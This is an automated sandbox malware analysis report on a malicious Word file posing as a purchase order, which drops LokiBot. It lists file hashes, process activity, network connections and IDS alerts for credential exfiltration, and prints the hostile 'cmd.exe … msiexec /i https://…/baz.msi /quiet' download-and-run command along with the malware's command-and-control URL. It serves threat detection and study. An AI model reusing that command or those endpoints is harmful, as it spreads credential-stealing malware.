File name: | New Order - PO-LBJPS19-01811.docx |
Full analysis: | https://app.any.run/tasks/7c56a3df-2859-4af6-89ba-667c31e29677 |
Verdict: | Malicious activity |
Threats: | LokiBot was developed in 2015 to steal information from a variety of applications. Despite the age, this malware is still rather popular among cybercriminals. |
Analysis date: | December 14, 2018, 06:04:50 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | B37879A5ECD333C16F7A192F86855115 |
SHA1: | 5A658A85E90434FB3750D6F210D4B6A695FF2B33 |
SHA256: | D1B1321BEA0B253F8527AF8AE0F32103470F6167CAE585D228840EBBDB515DCF |
SSDEEP: | 3072:e7lL2mrdFADYhDFc8rpKSvNYbWRDzUyRBelYc3nTMSFm9d+tlKSIKg:e7lCAdFkYhDFBxvqyRmTMSFmfSe |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0x2ea8411c |
ZipCompressedSize: | 351 |
ZipUncompressedSize: | 1364 |
ZipFileName: | [Content_Types].xml |
Template: | template.dotx |
---|---|
TotalEditTime: | - |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Application: | Microsoft Office Word |
DocSecurity: | None |
Lines: | 1 |
Paragraphs: | 1 |
ScaleCrop: | No |
HeadingPairs: |
|
TitlesOfParts: | - |
Company: | - |
LinksUpToDate: | No |
CharactersWithSpaces: | 1 |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 15 |
Keywords: | - |
LastModifiedBy: | Richard |
RevisionNumber: | 2 |
CreateDate: | 2018:12:11 23:39:00Z |
ModifyDate: | 2018:12:11 23:39:00Z |
Title: | - |
---|---|
Subject: | - |
Creator: | Windows User |
Description: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3320 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\New Order - PO-LBJPS19-01811.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3564 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2160 | cmd.exe & /C CD C: & msiexec.exe /i https://vkingsolutions.com/css/secured/baz.msi /quiet | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2904 | msiexec.exe /i https://vkingsolutions.com/css/secured/baz.msi /quiet | C:\Windows\system32\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3196 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2336 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2980 | "C:\Windows\Installer\MSIA2C1.tmp" | C:\Windows\Installer\MSIA2C1.tmp | — | msiexec.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1328 | "C:\Windows\Installer\MSIA2C1.tmp" | C:\Windows\Installer\MSIA2C1.tmp | MSIA2C1.tmp | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8505.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{6B26F23A-3250-4FF7-8DA3-331B4F5EB084} | — | |
MD5:— | SHA256:— | |||
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{6BB91254-169B-4812-875B-4F285D828E1A} | — | |
MD5:— | SHA256:— | |||
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{6A17FB15-5F20-4CB2-B2A2-4FAD02D4CB4D} | — | |
MD5:— | SHA256:— | |||
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2A01C260-6B0A-4A81-B6EF-9A5EB442D5E3}.FSD | binary | |
MD5:BED4679A049BDF2DE31D6CCC8842C4E0 | SHA256:F67F13DE367EF2360F542F08C4F48E57980E3B1C7500023EAEAD52070922BDC1 | |||
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD | binary | |
MD5:27691E6A32A9EF1B3F5BF840A060B3E1 | SHA256:BDD5F0F8B8D303AB8ABE8C02EAF2523CEC9C077D50425D1DEA5E5163CB744D05 | |||
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD | binary | |
MD5:35290DB82F7B2F8111044FE46F41417A | SHA256:E7B1CCFDD45A164133C74E249F6DE076400B99B708EFC1D68069473154D88FB3 | |||
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF | binary | |
MD5:33B7505E5CA00C0CA710521D0CFEB5BA | SHA256:1B4284FFBA8839672E90583A9D39953AE1DAC4C4BA1E75BCB0B9D0D342DD2509 | |||
3320 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:0FEE22FA40EAB618E269AF59EF990721 | SHA256:DB543AC7F35DE26670D8A65A74DD48BCF6E5E70FF2A75D8A42E2FD500F8A170D | |||
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$w Order - PO-LBJPS19-01811.docx | pgc | |
MD5:2A466149C7115F4A1C3EED12F515FD71 | SHA256:C55F00C42A133552917765412354813B6655EB0611101809CF55904B3718A42E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1328 | MSIA2C1.tmp | POST | — | 104.24.119.38:80 | http://e-vam.ir/wp-includes/themes/fre.php | US | — | — | malicious |
1328 | MSIA2C1.tmp | POST | — | 104.24.119.38:80 | http://e-vam.ir/wp-includes/themes/fre.php | US | — | — | malicious |
1328 | MSIA2C1.tmp | POST | — | 104.24.119.38:80 | http://e-vam.ir/wp-includes/themes/fre.php | US | — | — | malicious |
1328 | MSIA2C1.tmp | POST | — | 104.24.119.38:80 | http://e-vam.ir/wp-includes/themes/fre.php | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3196 | msiexec.exe | 195.201.197.24:443 | vkingsolutions.com | Awanti Ltd. | RU | unknown |
1328 | MSIA2C1.tmp | 104.24.119.38:80 | e-vam.ir | Cloudflare Inc | US | shared |
3320 | WINWORD.EXE | 195.201.197.24:443 | vkingsolutions.com | Awanti Ltd. | RU | unknown |
Domain | IP | Reputation |
---|---|---|
vkingsolutions.com |
| unknown |
e-vam.ir |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
1328 | MSIA2C1.tmp | A Network Trojan was detected | ET TROJAN LokiBot User-Agent (Charon/Inferno) |
1328 | MSIA2C1.tmp | A Network Trojan was detected | ET TROJAN LokiBot Checkin |
1328 | MSIA2C1.tmp | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 |
1328 | MSIA2C1.tmp | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 |
1328 | MSIA2C1.tmp | A Network Trojan was detected | MALWARE [PTsecurity] Loki Bot Check-in M2 |
1328 | MSIA2C1.tmp | A Network Trojan was detected | ET TROJAN LokiBot User-Agent (Charon/Inferno) |
1328 | MSIA2C1.tmp | A Network Trojan was detected | ET TROJAN LokiBot Checkin |
1328 | MSIA2C1.tmp | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 |
1328 | MSIA2C1.tmp | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 |
1328 | MSIA2C1.tmp | A Network Trojan was detected | MALWARE [PTsecurity] Loki Bot Check-in M2 |